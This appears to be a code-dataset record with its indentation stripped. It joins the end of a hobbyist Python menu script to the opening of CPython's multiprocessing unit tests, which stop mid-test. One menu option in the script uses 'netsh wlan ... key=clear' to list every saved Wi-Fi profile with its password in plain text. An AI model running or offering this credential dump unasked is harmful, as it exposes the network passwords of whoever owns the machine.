# 'zh-tw':'Chinese (Mandarin/Taiwan)','zh-yue':'Chinese (Cantonese)','hr':'Croatian','cs':'Czech','da':'Danish','nl':'Dutch','en':'English','en-au':'English (Australia)',
# 'en-uk':'English (United Kingdom)','en-us':'English (United States)','fi':'Finnish','fr':'French','de':'German','el':'Greek','hi':'Hindi','hu':'Hungarian','is':'Icelandic',
# 'id':'Indonesian','it':'Italian','ja':'Japanese','ko':'Korean','la':'Latin','lv':'Latvian','mk':'Macedonian','no':'Norwegian','pl':'Polish','pt':'Portuguese',
# 'pt-br':'Portuguese (Brazil)','ro':'Romanian','ru':'Russian','sr':'Serbian','sk':'Slovak','es':'Spanish','es-es':'Spanish (Spain)','es-us':'Spanish (United States)',
# 'sw':'Swahili','sv':'Swedish','ta':'Tamil','th':'Thai','tr':'Turkish','vi':'Vietnamese','cy':'Welsh'
print("SOURCE Langauge : ",translated.src)
print("DESTINATION Langauge : ",translated.dest,"\n")
print("Translated :")
print(translated.text)
print("please wait...processing")
TTS = gTTS(text=translated.text, lang='en-in') #lang changes the accent
#Accents -
#en-au (Australia)
# en-gb (United Kingdom)
# en-in (India)
# en-us (United States)
# Save to mp3 in current dir.
TTS.save("voice.mp3")
# Plays the mp3 using the default app on your system
# that is linked to mp3s.
os.system("start voice.mp3")
pass
elif choice == 4:
# initializing
covid = Covid()
# printing data for the world
print("Total active cases in world:", covid.get_total_active_cases())
print("Total recovered cases in world:", covid.get_total_recovered())
print("Total deaths in world:", covid.get_total_deaths())
# getting data according to country name
# data will be stored as a dictionary
cases = covid.get_status_by_country_name("INDIA")
# printing country's data using for loop
for x in cases:
print(x, ":", cases[x])
pass
elif choice==5:
# getting machine name
hostname = socket.gethostname()
# getting IP Address
IPAddr = socket.gethostbyname(hostname)
# printing hostname
print("Your Computer Name is:" + hostname)
# printing IP Address
print("Your Computer IP Address is:" + IPAddr)
pass
elif choice==6:
# now we will store the profiles data in "data" variable by
# running the 1st cmd command using subprocess.check_output
data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
# now we will store the profile by converting them to list
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
# using for loop in python we are checking and printing the wifi
# passwords if they are available using the 2nd cmd command
for i in profiles:
# running the 2nd cmd command to check passwords
results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i,
'key=clear']).decode('utf-8').split('\n')
# storing passwords after converting them to list
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
# printing the profiles(wifi name) with their passwords using
# try and except method
try:
print ("{:<30}| {:<}".format(i, results[0]))
except IndexError:
print ("{:<30}| {:<}".format(i, ""))
pass
elif choice==7:
#These are the dots and dashes or dits and dahs correspond to the alphabet
CODE = {'A': '.-', 'B': '-...', 'C': '-.-.',
'D': '-..', 'E': '.', 'F': '..-.',
'G': '--.', 'H': '....', 'I': '..',
'J': '.---', 'K': '-.-', 'L': '.-..',
'M': '--', 'N': '-.', 'O': '---',
'P': '.--.', 'Q': '--.-', 'R': '.-.',
'S': '...', 'T': '-', 'U': '..-',
'V': '...-', 'W': '.--', 'X': '-..-',
'Y': '-.--', 'Z': '--..',
'0': '-----', '1': '.----', '2': '..---',
'3': '...--', '4': '....-', '5': '.....',
'6': '-....', '7': '--...', '8': '---..',
'9': '----.'
}
ONE_UNIT = 0.5
THREE_UNITS = 3 * ONE_UNIT
SEVEN_UNITS = 7 * ONE_UNIT
PATH = 'morse_sound_files/' #The path of the audio file
#The method Verifies that there shouldn't be any special characters
def verify(string):
keys = CODE.keys()
for char in string:
if char.upper() not in keys and char != ' ':
sys.exit('Error the charcter ' + char + ' cannot be translated to Morse Code')
def main():
print('Welcome to Alphabet to Morse Code Translator v.01\n')
msg = input('Enter Message: ')
verify(msg)
print
pygame.init()
fi=[]
for char in msg:
if char == ' ':
print (' '*7,
time.sleep(SEVEN_UNITS))
else:
print (CODE[char.upper()],
pygame.mixer.music.load(PATH + char.upper() + '_morse_code.ogg'))
pygame.mixer.music.play()
time.sleep(THREE_UNITS)
temp=CODE[char.upper()],pygame.mixer.music.load(PATH + char.upper() + '_morse_code.ogg')
fi.append(temp)
actualCode,noneList=zip(*fi) #unzipped the list here into two list to get the final Mores Code at the end
print("Your Moores Code:",''.join(actualCode))
print ('\n\nGoodbye!')
if __name__ == "__main__":
main()
pass
elif choice ==8:
quit()
else:
print("\ninvalid ! Try again")
except Exception as e:
print(e)
print("invalid details ! Try again")
#Threading
t1=Thread(target=playAudiobackground)
t1.start()
t1=Thread(target=main)
t1.start()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
